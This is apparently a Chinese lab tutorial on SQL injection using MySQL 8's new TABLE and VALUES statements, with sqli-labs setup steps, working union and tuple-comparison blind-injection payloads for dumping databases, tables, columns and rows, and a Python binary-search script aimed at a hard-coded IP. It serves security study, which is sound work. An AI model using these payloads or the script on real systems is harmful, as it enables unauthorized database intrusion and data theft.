MySQL 8 新特性 TABLE 注入分析总结<\/h1>

环境搭建<\/h2>

Docker 环境配置<\/h3>
拉取 MySQL 8.0.21 镜像：<\/p>
docker pull mysql:8.0.21
<\/span><\/span><\/code><\/pre><\/li>

运行容器：<\/p>
docker run -d --name=<\/span>mysql8 -p 3306:3306 -e MYSQL_ROOT_PASSWORD=<\/span>123456<\/span> mysql:8.0.21
<\/span><\/span><\/code><\/pre><\/li>

修改认证方式（MySQL 8 默认认证方式与 5.x 不同）：<\/p>
ALTER<\/span> USER<\/span> 'root'<\/span> IDENTIFIED WITH<\/span> mysql_native_password BY<\/span> '123456'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
SQL 注入靶场搭建<\/h3>

下载 vulstudy 综合环境<\/li>
启动 SQL 注入靶场<\/li>
修改 sqli-lab 配置文件 \/app\/sql-connections\/db-creds.inc<\/code>

填写 MySQL 连接信息<\/li>
数据库 IP 填写宿主机 IP（如 172.30.102.102）<\/li>
<\/ul>
<\/li>
<\/ol>
MySQL 8 新特性语法<\/h2>
TABLE 语句<\/h3>
功能<\/strong>：与 SELECT 相似，用于列出表中所有内容<\/p>
语法<\/strong>：<\/p>
TABLE<\/span> table_name<\/span> [ORDER<\/span> BY<\/span> column_name<\/span>] [LIMIT<\/span> number [OFFSET<\/span> number]]
<\/span><\/span><\/code><\/pre>与 SELECT 的区别<\/strong>：<\/p>

TABLE 始终显示表的所有列<\/li>
TABLE 不允许对行进行任意过滤，不支持 WHERE 子句<\/li>
<\/ol>
示例<\/strong>：<\/p>
-- 等效于 SELECT * FROM t1 UNION SELECT * FROM t2
<\/span><\/span><\/span><\/span>TABLE<\/span> t1 UNION<\/span> TABLE<\/span> t2;
<\/span><\/span><\/code><\/pre>注入应用<\/strong>：<\/p>

获取所有表名：table information_schema.schemata;<\/code><\/li>
<\/ul>
VALUES 语句<\/h3>
功能<\/strong>：以表形式返回一组一行或多行数据，可作为表值构造函数<\/p>
语法<\/strong>：<\/p>
VALUES<\/span> row_constructor_list [ORDER<\/span> BY<\/span> column_designator] [LIMIT<\/span> number]
<\/span><\/span>
<\/span><\/span>row_constructor_list:
<\/span><\/span>    ROW<\/span>(value_list)[, ROW<\/span>(value_list)][, ...]
<\/span><\/span>
<\/span><\/span>value_list:
<\/span><\/span>    value[, value][, ...]
<\/span><\/span>
<\/span><\/span>column_designator:
<\/span><\/span>    column_index
<\/span><\/span><\/code><\/pre>示例<\/strong>：<\/p>
VALUES<\/span> ROW<\/span>(1<\/span>, -<\/span>2<\/span>, 3<\/span>), ROW<\/span>(5<\/span>, 7<\/span>, 9<\/span>), ROW<\/span>(4<\/span>, 6<\/span>, 8<\/span>) ORDER<\/span> BY<\/span> column_1;
<\/span><\/span><\/code><\/pre>注入应用<\/strong>：<\/p>

判断列数（替代 order by）：
select<\/span> *<\/span> from<\/span> table<\/span> where<\/span> id=<\/span>1<\/span> union<\/span> values<\/span> row<\/span>(1<\/span>,2<\/span>,3<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
盲注技术<\/h2>
盲注原理<\/h3>
使用元组比较进行盲注，比较顺序是自左到右：<\/p>
select<\/span> ((1<\/span>, ''<\/span>, ''<\/span>) <<\/span> (table<\/span> user<\/span> limit<\/span> 1<\/span>));
<\/span><\/span>select<\/span> ((2<\/span>, ''<\/span>, ''<\/span>) <<\/span> (table<\/span> user<\/span> limit<\/span> 1<\/span>));
<\/span><\/span>select<\/span> ((1<\/span>, 'T'<\/span>, ''<\/span>) <<\/span> (table<\/span> user<\/span> limit<\/span> 1<\/span>));
<\/span><\/span><\/code><\/pre>注意<\/strong>：<\/p>

判断时后一个列名必须用字符表示，不能用数字<\/li>
对于数据表字段爆破，建议加上 binary<\/code> 关键字以区分大小写<\/li>
<\/ul>
盲注脚本分析<\/h3>
import<\/span> requests
<\/span><\/span>import<\/span> string
<\/span><\/span>
<\/span><\/span>url =<\/span> 'http:\/\/152.136.11.155:10111\/'<\/span>
<\/span><\/span>chars =<\/span> "0123456789_abcdefghijklmnopqrstuvwxyz<\/span>{}<\/span>!?"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> str2hex<\/span>(name):
<\/span><\/span>    res =<\/span> ''<\/span>
<\/span><\/span>    for<\/span> i in<\/span> name:
<\/span><\/span>        res +=<\/span> hex(ord(i))
<\/span><\/span>    res =<\/span> '0x'<\/span> +<\/span> res.<\/span>replace('0x'<\/span>, ''<\/span>)
<\/span><\/span>    return<\/span> res
<\/span><\/span>
<\/span><\/span>def<\/span> dbs<\/span>():
<\/span><\/span>    for<\/span> num in<\/span> range(10<\/span>):
<\/span><\/span>        i =<\/span> 0<\/span>
<\/span><\/span>        j =<\/span> 0<\/span>
<\/span><\/span>        db =<\/span> ''<\/span>
<\/span><\/span>        while<\/span> True<\/span>:
<\/span><\/span>            head =<\/span> 32<\/span>
<\/span><\/span>            tail =<\/span> 127<\/span>
<\/span><\/span>            i +=<\/span> 1<\/span>
<\/span><\/span>            while<\/span> head <<\/span> tail:
<\/span><\/span>                j +=<\/span> 1<\/span>
<\/span><\/span>                mid =<\/span> (head +<\/span> tail) \/\/<\/span> 2<\/span>
<\/span><\/span>                payload =<\/span> f<\/span>"1 and ('def',<\/span>{<\/span>str2hex(db+<\/span>chr(mid))}<\/span>,'',4,5,6)>(table information_schema.schemata limit "<\/span> +<\/span> str(num) +<\/span> ",1)--+"<\/span>
<\/span><\/span>                param =<\/span> "?id="<\/span> +<\/span> payload
<\/span><\/span>                r =<\/span> requests.<\/span>get(url +<\/span> param)
<\/span><\/span>                if<\/span> "psych"<\/span> in<\/span> r.<\/span>text:
<\/span><\/span>                    tail =<\/span> mid
<\/span><\/span>                else<\/span>:
<\/span><\/span>                    head =<\/span> mid +<\/span> 1<\/span>
<\/span><\/span>            if<\/span> head !=<\/span> 32<\/span>:
<\/span><\/span>                if<\/span> (chr(head -<\/span> 1<\/span>) ==<\/span> ' '<\/span> and<\/span> db[-<\/span>1<\/span>] ==<\/span> ' '<\/span>):
<\/span><\/span>                    break<\/span>
<\/span><\/span>                db +=<\/span> chr(head -<\/span> 1<\/span>)
<\/span><\/span>                print(db)
<\/span><\/span>            else<\/span>:
<\/span><\/span>                break<\/span>
<\/span><\/span><\/code><\/pre>脚本特点<\/strong>：<\/p>

采用二分法提高盲注速度<\/li>
使用 binary<\/code> 字段解决大小写问题<\/li>
包含数据库、表、列、数据的爆破功能<\/li>
<\/ol>
标准注入步骤<\/h2>
1. 判断列数<\/h3>
1<\/span> order<\/span> by<\/span> 2<\/span> --+
<\/span><\/span><\/span><\/span>1<\/span> order<\/span> by<\/span> 3<\/span> --+
<\/span><\/span><\/span><\/code><\/pre>2. 判断回显位<\/h3>
1<\/span> union<\/span> values<\/span> row<\/span>(1<\/span>,2<\/span>) --+
<\/span><\/span><\/span><\/code><\/pre>3. 爆数据库信息<\/h3>
爆当前数据库<\/strong>：<\/p>
1<\/span>' union values row(1,database(),3)--+
<\/span><\/span><\/span>-- 或盲注
<\/span><\/span><\/span>1'<\/span> and<\/span> ascii(substr((database<\/span>()),1<\/span>,1<\/span>)) =<\/span> 115<\/span> --+  -- s
<\/span><\/span><\/span><\/code><\/pre>爆所有数据库<\/strong>：<\/p>
1<\/span> and<\/span> ('def'<\/span>,'m'<\/span>,''<\/span>,4<\/span>,5<\/span>,6<\/span>)<=<\/span>(table<\/span> information_schema.schemata limit<\/span> 0<\/span>,1<\/span>)--+  -- 正常
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> ('def'<\/span>,'n'<\/span>,''<\/span>,4<\/span>,5<\/span>,6<\/span>)<=<\/span>(table<\/span> information_schema.schemata limit<\/span> 0<\/span>,1<\/span>)--+  -- 错误
<\/span><\/span><\/span><\/code><\/pre>4. 爆数据表<\/h3>
1<\/span> and<\/span> ('def'<\/span>,'security'<\/span>,'users'<\/span>,''<\/span>,5<\/span>,6<\/span>,7<\/span>,8<\/span>,9<\/span>,10<\/span>,11<\/span>,12<\/span>,13<\/span>,14<\/span>,15<\/span>,16<\/span>,17<\/span>,18<\/span>,19<\/span>,20<\/span>,21<\/span>)<=<\/span>(table<\/span> information_schema.tables limit<\/span> 310<\/span>,1<\/span>)--+  -- 第一个表users
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> ('def'<\/span>,'security'<\/span>,'secret'<\/span>,''<\/span>,5<\/span>,6<\/span>,7<\/span>,8<\/span>,9<\/span>,10<\/span>,11<\/span>,12<\/span>,13<\/span>,14<\/span>,15<\/span>,16<\/span>,17<\/span>,18<\/span>,19<\/span>,20<\/span>,21<\/span>)<=<\/span>(table<\/span> information_schema.tables limit<\/span> 311<\/span>,1<\/span>)--+  -- 第二个表secret
<\/span><\/span><\/span><\/code><\/pre>5. 爆字段名<\/h3>
1<\/span> and<\/span> ('def'<\/span>,'security'<\/span>,'users'<\/span>,'id'<\/span>,''<\/span>,6<\/span>,7<\/span>,8<\/span>,9<\/span>,10<\/span>,11<\/span>,12<\/span>,13<\/span>,14<\/span>,15<\/span>,16<\/span>,17<\/span>,18<\/span>,19<\/span>,20<\/span>,21<\/span>,22<\/span>)<=<\/span>(table<\/span> information_schema.columns limit<\/span> 3380<\/span>,1<\/span>)--+  -- users表第一个字段为id
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> ('def'<\/span>,'security'<\/span>,'users'<\/span>,'username'<\/span>,''<\/span>,6<\/span>,7<\/span>,8<\/span>,9<\/span>,10<\/span>,11<\/span>,12<\/span>,13<\/span>,14<\/span>,15<\/span>,16<\/span>,17<\/span>,18<\/span>,19<\/span>,20<\/span>,21<\/span>,22<\/span>)<=<\/span>(table<\/span> information_schema.columns limit<\/span> 3381<\/span>,1<\/span>)--+  -- users表第二个字段为username
<\/span><\/span><\/span><\/code><\/pre>6. 爆数据<\/h3>
1<\/span> and<\/span> (1<\/span>,'d'<\/span>,''<\/span>) <=<\/span> (table<\/span> users limit<\/span> 0<\/span>,1<\/span>)--+  -- 正常
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> (1<\/span>,'e'<\/span>,''<\/span>) <=<\/span> (table<\/span> users limit<\/span> 0<\/span>,1<\/span>)--+  -- 错误
<\/span><\/span><\/span><\/code><\/pre>注意事项<\/h2>

大小写问题<\/strong>：MySQL 在 Linux 上默认区分大小写（lower_case_table_names=0<\/code>），但在数据表字段爆破时建议加上 binary<\/code> 确保准确性<\/li>
行数确定<\/strong>：需要爆破数据表和数据列所在的具体行数<\/li>
列数匹配<\/strong>：使用 TABLE 语句时必须确保列数匹配，否则会报错<\/li>
盲注效率<\/strong>：使用二分法可以显著提高盲注效率<\/li>
<\/ol>
通过掌握这些 MySQL 8 的新特性注入技术，可以在传统 SQL 注入方法受限时实现有效的数据获取。<\/p>